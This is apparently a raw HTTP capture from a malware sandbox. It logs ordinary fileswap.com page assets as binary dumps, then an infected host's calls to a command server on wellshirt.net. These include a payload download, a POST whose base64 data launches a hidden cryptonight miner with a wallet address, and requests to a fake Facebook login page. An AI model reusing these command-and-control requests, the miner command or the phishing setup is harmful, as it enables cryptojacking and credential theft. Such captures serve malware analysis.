User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 2437

Last-Modified: Thu, 13 Sep 2012 22:56:56 GMT

Connection: keep-alive

ETag: "505264b8-985"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR...".........M..]....tEXtSoftware.Adobe ImageReadyq.e&
lt;...'IDATx..]{l.U.?...c......F..-.@5<ve..'1f.5.... $...Dw5i..Q..&
f.?....D.(b..UYt..E.D..*.-..nw....:3............~c.9.M........;...V4.t
..=..k.X;.......tQ.......X..zD.O.=..../ ..Q[4..w.:..].Ajm......[..k..V
 ..?..uo..S.......`[email protected]...~.)!.:.Lry...-.Uo.*....Y..._.......eSY..  
.....$U...a [email protected] [email protected] [email protected].?j.....A:ptX...s.
....h.W....$.....=........#.'.....}.......QA..k. .i..-..i......k..|..V
/.......g.......|..|.0.n.%.....w..........Q ....q.........4....J.5.'..
... ..P.Qg..g(FtZ(....Z>.'??p4\z U).8c.'.5...........Gb.......G.9..
....#P......I.....pq.......OD..bi...&r..A.grl.d.a...g...eOwZ.H....(@..
!}[. . h!x!.....{..>94>P..VW_......l.3.."]SXZ5.#.8..n...z...."..
....9..@..."...7..w]=]8......~.......S]}..[.N..\J.R...l.UT.u..~.c {.3.
.r..y...u....).=P.....^.Hdf.....L.*.g._]...?.....w.0.5..*.h.}x0(....Y"
@,[email protected]..............( *K~...4.3V5.....&.3.....d...*G..........
.4.......n..V,[email protected]..(8....Q......=`r......kJ.5.C......... .. ....t.;*m
Dk..x8w...7jR.B#.e..[....Y..*.a.he.m.%[email protected]..
........c_-..T.Iz..n..Q..[zZ...~.(n8cz.8.Mo.........S<..Q...G...O. 
........,B9.-......h..!Va5N.^.*.g7....'......%..\..yw.PF\[email protected]#..8
....&e._]u.\.E.....[,...GP.A...-\ ..[.rB...9.*!`.-...".......t8...^.B^
....zOJ;.p.!.v>2....d;..f....J.F>YsYF....q.[...`#..&F....6..D.D 
v h..&h.y.......h..7..w...y.fK{.......%h..h.....>%KOt...7k\c.h..u.4
. 3.......|..Jo.IG.Z.{.nb.o.X...k,.....Y(-`.F...J.Z5.../.jE....x2.
<<< skipped >>>

GET /_images/header_refer.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 986

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3da"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...|IDATx..V]HSa.......t.X...?.5.7rW..#.......e.A....W]t.H.].r... .
........h....3.v.N..#...9.b.<....;[email protected]. .Z..p...r
.!..5.x...E......B...g..2.V...1..<...OFGG.UUU-.K.../.9...I$....0J.R
R.P.......P..j%..h...-{.@"B..Z.V3;;k...v......d.#..MMM.....\.G.-.H...P
h........m6.k...<t.......|>_...F...c; ... ..).......z...= &.b..G
[email protected]...@B...?\.a.g.Yy....d...5.(.tsPs..r}g
...!fH.}......E".W*...:.r.\..3".}[email protected].....
...H4 N....L0.D...S,..>0....;w...d.k0.Lxf1<..w..;.sr..]b..x.....
.......*...1..r. .^.......A.y...:,...XYY.......V.8. ...].....5..T...!.
.....z.A...I.q...t:.......@._....Gi..V;........444.....=m<..B..0".E
[...a...t....nGG......###.1.....?-//o........-..].....{..G..|>...8.
i`..a.U...........J...u...m? .g..$tu.$.b...`0hu...333.D$`[email protected].
*&..}W.,...lF..~.5......!...P. ...H.......pd..c.?.z*.s,.L.8.....= ..I;
P.U\q..r.....$a....R.....IEND.B`.....


GET /_images/home/home_gradient_01.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 292

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-124"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.......%......=.J....tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx...m..0...y2..9es*..........M1..=..F..h f.o.=&-~?i...(....
..G.N.B.._^..M<.o`q..L9W...%2......4}......g.u...O......?^.g../z...
..o.I.wg&V.\...".p...?*^Y..^/.`..2{.......^......s.4c...w.>z.sa./..
.v...'4W.....IEND.B`.....


GET /_images/home/home_gradient_02.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 193

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-c1"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.......T......4......tEXtSoftware.Adobe ImageReadyq.e&
lt;...cIDATx.b.Zs.....L...................?.........GfC......a.......P
.M.................H......'.......`.zlb..r{.....IEND.B`...

GET /_js/jquery-ui.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 90088

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-15fe8"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
/*!. * jQuery UI 1.8.16. *. * Copyright 2011, AUTHORS.txt (hXXp://jque
ryui.com/about). * Dual licensed under the MIT or GPL Version 2 licens
es.. * hXXp://jquery.org/license. *. * hXXp://docs.jquery.com/UI. */.(
function(c,j){function k(a,b){var d=a.nodeName.toLowerCase();if("area"
===d){b=a.parentNode;d=b.name;if(!a.href||!d||b.nodeName.toLowerCase()
!=="map")return false;a=c("img[usemap=#" d "]")[0];return!!a&&l(a)}ret
urn(/input|select|textarea|button|object/.test(d)?!a.disabled:"a"==d?a
.href||b:b)&&l(a)}function l(a){return!c(a).parents().andSelf().filter
(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filt
ers.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.u
i,{version:"1.8.16",.keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:18
8,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOW
N:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPA
D_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD
_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,R
IGHT:39,SHIFT:16,SPACE:32,TAB:9,UP:38,WINDOWS:91}});c.fn.extend({propA
ttr:c.fn.prop||c.fn.attr,_focus:c.fn.focus,focus:function(a,b){return 
typeof a==="number"?this.each(function(){var d=.this;setTimeout(functi
on(){c(d).focus();b&&b.call(d)},a)}):this._focus.apply(this,arguments)
},scrollParent:function(){var a;a=c.browser.msie&&/(static|relative)/.
test(this.css("position"))||/absolute/.test(this.css("position"))?this
.parents().filter(function(){return/(relative|absolute|fixed)/.tes
<<< skipped >>>

GET /_images/ico_24_sharelink.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1569

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-621"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uu
id:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:0DBC3ED
DE30D11E1B1D2E3CE95056E0B" xmpMM:InstanceID="xmp.iid:0DBC3EDCE30D11E1B
1D2E3CE95056E0B" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:D
erivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" st
Ref:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>.......dIDATx..U=.ZA..O.*X.....".XH..%..........2?!.j...J,..VV.*
...),D..ET.z....YV........ef..9g....q..x.&.Wn.>....8..v.4...C......
*..R.f..a..lv....2.Nb..O\{G.p.q.w..=....d.X.m:...xL...#..z$.._$9..(..X
.Vd.^...l6#.....CF.\..=D".`$..8i.`.).;.(.v.._.E............?`.@N$..V^2
.<.=.).\...B.x.FJ..z.m*...`L...g..e...3 .S.....$.......M.P.....Z...
[email protected]*.b>...../.v..n._M....t.P.....s...2...T*.z.,d..TE......._
MP,...h..@...$...0..`.X..lB$..~..v...N'.Z.......r..j...C...Q.....x<
.p...G....h......r.R.M..(.e8.....Q..M....:..p..f"*DD...fS.r9Y!....
<<< skipped >>>

GET /_images/logo/fileswap_large.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 11897

Last-Modified: Tue, 18 Sep 2012 15:38:12 GMT

Connection: keep-alive

ETag: "50589564-2e79"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.......<.............tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..}.|....3...=r....%..K...YN..D....V.....P..R[/....Bm..
|...UD.P.D.hU.."!$!..f.s..........n8......dg.{~............._M%......P
8s..$.......P..3`(C.7......;...'.........B...h:Q.jT......f.,...8Y![..&
......n.33.p.......|>..L>yOf.v.I..7..8...j.\..G?..-...~..K..S.N.
.-.M&..a._Z,.....`[email protected]...~.[0.R.z....2.l..p&..C$6.2.w..7a.{..
.....|..3l....P4...w.{.?W^2(.o..D.g1...............8p.........55J..#-.
.zS..#.P..'V.M\[email protected],.gA ]sn1.2.F...m.........h.G.]...|...l......
.. .TF__.^...f..c.um.!.*)...@7`..0.d..?.=........x.j.z.K.UZ...FRYd .V-
_...&w_;..5zU...vo.7:.@... ..[>6'E......).>.T#[email protected]_..|.
... U)..x.}.......0.........d...a%.....Xe!c........R..:......{.zq.R]6.
:C.....`..t:.b....Hggg..,..'B3U.ikk#..<..$....!i.o......U.G >..i
....rem1...3.X.@^....{Q).`...a{..... ....~.... v...j.Z..=.......^.<
E.....q........Q.]...v.I..0H..h.].d.8...>.)....4.....x...S.X5@;....
&..PI.... .....e,].....J.....<Y... ........^...Epy.f..n.Y.j.......'
..{:..O{....[.....]r.(.j.).huI.....A..G....#.....f3'....X..q2e.....j.~
...Ak...;....5Lj.R.2.B=.f.._.vd..19.u1...s.O&-.{.....G...O.J...GO..v.p
\.,?.......~.s.|...Dn...X.j....-.~.!.>. }.....;...`.R.*l:Z......z.p
......T......z...O.^.D...^..7d.r.../.*J.A....RWhG-\....}-.%...~....`0(
....s|k$*o6......Q..=.m.e....jc.-.0.........&.5.I`.n..=K.|...J..47e!^.
.Kp....#>&2...<.|..%...%..A...t......f....7.-e.i..~...j0u.1lu..w
Y..%,Cn.........."S B...UP.kP*...w...[&TY..3*.F.dM..%H...ih...Z...
<<< skipped >>>

GET /_images/home/home_upload_button.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 34227

Last-Modified: Mon, 17 Sep 2012 17:52:51 GMT

Connection: keep-alive

ETag: "50576373-85b3"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.......x.............tEXtSoftware.Adobe ImageReadyq.e&
lt;...UIDATx.....%E.6.T.8yv.....9GvI.d%.(.....(A./.J.U..I..Y........"a
.X.e...ff'..............."...W/.......9.9.N.J).x......oB]H.9.....%ob[F
...6P..:e..S.<..&.\P.I4.T.&:.....4........6X.M..Tu...!`....h...j...
-......a...q&e.$..$...7. I..S..#...IH..[.7CYP........T.....z..>....
.0.......A.W..G2... ...|.u..~... ..^...."6.o.z...D"!.?..app..K/..z.3n.
...*  ..D".....q.%..T.`u.j..:nQ.'..7.|eEE....t....g...V,...n.V.!.J....
..z.....[...p.!..-%fhh...}.so...{......F....f.z.......X?.!.LJ.......I.
.u..wX..!...W&...9....Z#.&.:.r.....|E.....o~s%....x.S.ByV...O...?.F1..
..`..l,.:.,."......u......Z....^']p..O.....l>........d.X.|?.b.. ...
X.......k,|.'...4...2k...o....H.w...H.......e../...[.I.2J..6..7|.._.^&
x..K^...J.5.....ym.m&........1.7.x.%g.R.....lT.....7r.~......_...2..k_
...Au`2.P.z&'..:\{..._ ..._...UUUW..`.f7{..l..... ..mI^u.U.uuu.g...===
._.....~...qu.p.B[.....ve..z..~O..~C....../....... .p.W.u .~.#{.....$'
).N[(.....k..?./G...=E..u.#.u8.U.....F.N.P.........TE?... ..p.7.LW}V..
...xH....T...~8%`><.&...9..p.....Yn../...WE.E9.!_n..\H." #H.Y..:
..Wi..X.E....z.......C...X{f...j..........{.ny.............a....$.....
q..=9m..IG.yd.C.v.5....0M..}t.D....{....^.i..u:.#]ju.Tf./D5>"aU....
)..:..2..-js.}.....G.q.....C....D..S.r.RN.P..P.!.......C.y.s...E.(>
...^................:O.........;.}...[.%y.3..r&...8.Y...6..tAP.....-;.
..`...e ...3)G.He.,......T..~.H..9....."..%.kt...cF..J*?.B....0..... .
..dX...^Q......R..>g$.e...l.-..k....$o.........c.9... Og... ...
<<< skipped >>>

GET /_images/home/home_upload_02.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 25736

Last-Modified: Wed, 12 Sep 2012 22:41:27 GMT

Connection: keep-alive

ETag: "50510f97-6488"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
......Exif..II*.................Ducky.......P.....&Adobe.d............
......./...G...d......................................................
......................................................................
......................................................................
........................................... 0@.!3..P1"2..`#CD.AB$4%5..
.......................!.01A2...Qaq.."r.3 @.....BR..#.45Pb..s...$..CSc
.`..DTU..................... @`!1P.0.."AQa2....................!1AQaq.
0@.... ...P..`..p.....................................................
......................................................................
......................................................................
......................................................................
.....................................................<=............
.......................>O..........................................
........2.............P...........e@......................(...........
..J.....'/D......f6.......V...O...........N...........................
[email protected].#.s..~.........xs...8..=5.. .V......`.u.......|..."..
.z................E%.....L..f4...*............#...|.j....u..7./..|~...
.)(...x...._.e.F.."...Z..X....Z..G@|..H..kn...6:[email protected].....!,.
.....S.x.'fiE..`.3...2.]........`...................z_...W..~.Z....D%.
.....\..|.._...5."..N2.?D..C.....g.........<..2.o.Q.<...........
/ ...P..M%...2`...,...}f.W.9..2]zK..%....[..a..>g_.....L.......[...
...>...v.{....Dj_.-@...!.....~..9.O5Zb...V...t.....z....V.3....
<<< skipped >>>

GET /forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:46 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..}.bG...C....j.&7 $..._.....!..purple.zip............................
...... ;."&{.|....G.qa.s."skS .&s.........w>....)l*...q.h....u..D..
...pb..........s........1...nkd..[.c.lP....t.q1.5y..4.Ld.-....U.S/....
[email protected]...........{1>.L...B..ci.\.N.....~.pS.9.K...#._...:.
t<....b..*..<....S.W...p........q"..w...L.S ....mC...D...'...h%n
_.cA..g...3..Z.R.Z..y.`..8...7P....c..:.........naxV.Vc.f.....F.N.....
f^@.!y9...........g....F#Q84k.-=.n.v...M....... !wdW.I....*.\.~7H'?..l
.{....ts.Um5=w..8-^}{.6'u.e%(?Cnb.....K.xAbGe.}..:?.G...@.,.~.....*...
..`..F.......^.g..m.F @.p..3.q/.#..H....D......|......../..q&...F.....
59.C...?.........g'.U]i.`...d..[[Nd..!..8......Tgr.c...A6T..../.".....
.T..B.G!...d.|u..=\1T9.|.l.q./Y$A.P....u...'.....#Ri.A$@..=.M>.U...
_.?..2...*.7..q.o.!......*.A...E..S..=_.U..?o........>.M-.m.......x
[email protected])5.$[..r..>...=2<.".L.1.l..~.y..0....d.z..SAWy
[email protected]...."x...~...%%u..W.n...i._..g.lC../..W:c"s.9.
 X.....wWi.b....a..&...(.o,..-o...C....z.y.oE!.r.>...*..BZ.(..=..6.
ieJl...,8..0.yK.23d..h.Z.I....D.\..!n..T.@v. ).....R.........A....6.n"
\....5.............

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:36 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
304....S........wellshirt.net.........B..,...Lz.h5#......P;..F2..9!..%
Lm...p.D=4a;.{?~a....j....|.7...#..GB..H.9,N.g.].M....f)..M...Q..w..:p
s......@x(b......0...Si..0YV..A.K.).x.$..>.2...M.T5..Z...5.MJ8..$..
.......1....F../UW...h...4.... ..3k..z.}....Kk.{..Dry.... .._Z.H...&..
..w..d?.q.4.~.....5Fu...{..L..........Y..'qG...O...R.:........>....
...G.*..].P0../..x.<..[&~.5... ..e?.C..@...,c....|....z....\P..~:..
.....M.3.j.....N..OK.J.........]_`..Je^...z..R. ."...2.].@8 ..b@.'....
....8O.........1W ....>\...A....O(LF..a()N Y.m.Dh..q!h#.K....yd?B.J
.....)J..V.BL.P.. [email protected];. p..*g;.bS......q\.....
j.0.//.vJ.:..=n.)=.~F.eg..S7..".>.....Mg^..'.B... [email protected]........."..
..)..r............'...g.a.b.gK.B/}p..p... d:\.1..bD...>j/.w..8.V1UH
..[.C:../Df.4hc............lm..3.$...I......#...B..sP.P".,.2.|. 5...l.
....E..A.....`M.7..zt.....1*.._...?X..c\-......Q.s .....J'.........q9.
...N.......V..-?..:.^.{K=E^/|...p.z.V....\..k. .^...$....B........>
..S.xTzQ.`..K....n3..y..h..e..gK...a...j#....W...L..icw.~.!..N,.....2.
.h..r;F..V....*.%.Ft...i..`E.=......3...?.b....&. .......t8..4.....`~.
>..xD.(..iC....w.;.8..t...O.....\D........Y...Ba.b...yp..a.j0.".s..
;TG...8..&..Py].VY..Z........;<...Qn......._....\.............e5U..
f....2..Ay.s...
<<< skipped >>>

POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 265

data=c3Bhd25lZDogJ3dpbjMybXJvY2xpMi5leGUgLWEgY3J5cHRvbmlnaHQgLWEgY3J5cHRvbmlnaHQgLW8gc3RyYXR1bSt0Y3A6Ly9taW5pbi5nczoxNzc3NyAtdSAxVkpydWV4WnpYdVJvczF0V2l4Q3FRNFA3Tlc4VjdxR0NZS3VSYnpYY0p6MmlpeGlTemJ6ODM3U1I0aEpCWlBvUWoxaUp0YmVLVHJlazJiWE50dEY2ZGdBTjZCampieCAtcCB4Jw0K
HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:47 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
.............

GET /fb_login/index_files/-PAXP-deijE.gif?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 43

Content-Type: image/gif

Age: 0

Connection: close

Server: YTS/1.20.28
GIF89a......./alok.!.......,...........D..;..

GET /fb_login/index_files/276449379149296_1535348985.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 741

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28
.PNG........IHDR...0... .....>.......IDATh.c...?.>...h3..#.>5
.)[email protected]..`b..g .H.n.I....5>..b..7L.......0
;...L!...d......3.[.X|3...:..&...1bgw.W....,Z*.O.|....PwK.~ {.x..../..
#<..df.%...7s.~..t....8.t/.&.3....A..A. '...g#[email protected]......!..<
;..=....:..|.:..:J...!......t.z.F.K..C>.H..p...5$.AH.B.=0Z.S....G^.
@..\|\y..zb.....y.X...W.|.... 9..Tx.cKF...L...1Z.K.6....tl.DVO..XY.$..
.....W.c.h\[email protected]....? ..g...`...`.T..|.....R......p...5$.."Q#...W.
K.?F...!E u.I....p1.....b.d.. ..e..&.$..2c...._>..........S~.y....7
MF.W.&7.h..6.&..q.d.122(...c..f.......r..-#! .b./....GL.~..7..x9...`s,
6.. ..1I..v....sr..L.`.0..$D..M...0B'.C?..9...''O_zr.....v^.....d.\,.M
y...a..................7Hp0..h1....h6. .........6...f....IEND.B`...

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:12 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

GET /fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

